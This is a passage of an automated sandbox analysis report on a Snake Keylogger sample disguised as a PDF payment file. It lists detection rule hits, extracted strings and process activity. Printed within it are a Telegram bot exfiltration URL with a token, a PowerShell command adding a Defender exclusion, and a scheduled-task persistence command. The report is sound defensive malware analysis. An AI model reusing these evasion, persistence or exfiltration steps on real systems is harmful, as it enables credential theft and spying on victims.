                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                    Source: YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/89.187.171.161d
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/89.187.171.161l
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49699 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49698 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode

                    System Summary

                    barindex
                    Source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: initial sampleStatic PE information: Filename: BEPZA MT103 Credit.pdf.exe
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_02FB4B000_2_02FB4B00
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_02FBD3C40_2_02FBD3C4
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_056588900_2_05658890
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_056500400_2_05650040
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_056500060_2_05650006
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_0565D5B30_2_0565D5B3
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_077B5E000_2_077B5E00
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_077BB0E00_2_077BB0E0
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_077BE9420_2_077BE942
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_07C577500_2_07C57750
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_07C577600_2_07C57760
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_07C556180_2_07C55618
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_07C556280_2_07C55628
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_07C56D500_2_07C56D50
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_07C56D600_2_07C56D60
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_07C5D5600_2_07C5D560
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_07C55A600_2_07C55A60
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_07C551F00_2_07C551F0
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_07C5E9A80_2_07C5E9A8
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 10_2_02B9C53010_2_02B9C530
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 10_2_02B9948010_2_02B99480
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 10_2_02B9C52110_2_02B9C521
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 10_2_02B92DDB10_2_02B92DDB
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 10_2_02B9946F10_2_02B9946F
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 10_2_06BD60F710_2_06BD60F7
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 10_2_06BD5DB410_2_06BD5DB4
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 10_2_06BDB65010_2_06BDB650
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 10_2_06BD31A810_2_06BD31A8
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 10_2_06BD6C7110_2_06BD6C71
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 10_2_06BD4A6010_2_06BD4A60
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_0136D3C411_2_0136D3C4
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_07485E0011_2_07485E00
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_0748B0E011_2_0748B0E0
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_0748E94211_2_0748E942
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_0788775011_2_07887750
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_0788776011_2_07887760
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_0788561811_2_07885618
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_0788562811_2_07885628
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_0788DD0011_2_0788DD00
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_07886D5011_2_07886D50
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_07886D6011_2_07886D60
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_0788CCC011_2_0788CCC0
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_07885A6011_2_07885A60
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_078851F011_2_078851F0
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 16_2_0126C53016_2_0126C530
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 16_2_01262DD116_2_01262DD1
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 16_2_0126948016_2_01269480
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 16_2_0126C52116_2_0126C521
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 16_2_0126946F16_2_0126946F
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 16_2_06C05DB416_2_06C05DB4
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 16_2_06C0B65016_2_06C0B650
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 16_2_06C031A816_2_06C031A8
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 16_2_06C06C7116_2_06C06C71
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 16_2_06C04A6016_2_06C04A60
                    Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1290497028.0000000008160000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs BEPZA MT103 Credit.pdf.exe
                    Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000000.1263065941.0000000000DE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIHia.exe0 vs BEPZA MT103 Credit.pdf.exe
                    Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1283020258.000000000140E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs BEPZA MT103 Credit.pdf.exe
                    Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs BEPZA MT103 Credit.pdf.exe
                    Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs BEPZA MT103 Credit.pdf.exe
                    Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1284942009.00000000030F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs BEPZA MT103 Credit.pdf.exe
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3710700225.000000000041A000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs BEPZA MT103 Credit.pdf.exe
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3711387177.0000000000BC7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs BEPZA MT103 Credit.pdf.exe
                    Source: BEPZA MT103 Credit.pdf.exeBinary or memory string: OriginalFilenameIHia.exe0 vs BEPZA MT103 Credit.pdf.exe
                    Source: BEPZA MT103 Credit.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: BEPZA MT103 Credit.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: YEGIgzyAhkvT.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, lTHTbNiDjeUoU6Vpd8.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, lTHTbNiDjeUoU6Vpd8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, lTHTbNiDjeUoU6Vpd8.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, lTHTbNiDjeUoU6Vpd8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/11@3/3
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeFile created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3E23.tmpJump to behavior
                    Source: BEPZA MT103 Credit.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: BEPZA MT103 Credit.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000000.1262992343.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, YEGIgzyAhkvT.exe.0.drBinary or memory string: SELECT YEAR(balance_date) AS Year, MONTH(balance_date) AS Month, SUM(profit) AS TotalIncome, SUM(expense) AS TotalExpense FROM Daily_Report GROUP BY YEAR(balance_date), MONTH(balance_date) ORDER BY Year, Month;QA monthly report of profits and expenses%QueryMonthlyReport9SELECT * FROM DATABASE_USERSmINSERT INTO DATABASE_USERS VALUES(@username,@password)[SELECT * FROM DATABASE_USERS WHERE [user_id]=IUPDATE DATABASE_USERS SET password='
                    Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000000.1262992343.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, YEGIgzyAhkvT.exe.0.drBinary or memory string: SELECT CONVERT(DATE, V.VISIT_TIME) AS Visit_Date, COUNT(V.CLIENT_VISIT_ID) AS Daily_Visits FROM Client_Visits V JOIN Clients C ON V.CLIENT_ID = C.CLIENT_ID GROUP BY CONVERT(DATE, V.VISIT_TIME) ORDER BY Visit_Date;QA monthly and daily report of gym visits
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3716690730.0000000003D1D000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000000.1262992343.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, YEGIgzyAhkvT.exe.0.drBinary or memory string: SELECT FORMAT(V.VISIT_TIME, 'yyyy-MM') AS Month, COUNT(V.CLIENT_VISIT_ID) AS Total_Visits FROM Client_Visits V JOIN Clients C ON V.CLIENT_ID = C.CLIENT_ID GROUP BY FORMAT(V.VISIT_TIME, 'yyyy-MM') ORDER BY Month;
                    Source: BEPZA MT103 Credit.pdf.exeVirustotal: Detection: 66%
                    Source: BEPZA MT103 Credit.pdf.exeReversingLabs: Detection: 75%
                    Source: BEPZA MT103 Credit.pdf.exeString found in binary or memory: -Added at (DD-MM-YYYY):
                    Source: BEPZA MT103 Credit.pdf.exeString found in binary or memory: Log OutIaddUpdateDeleteRowsToolStripMenuItem-Add/Update/Delete rows/clientToolStripMenuItem
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeFile read: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe"
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess created: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
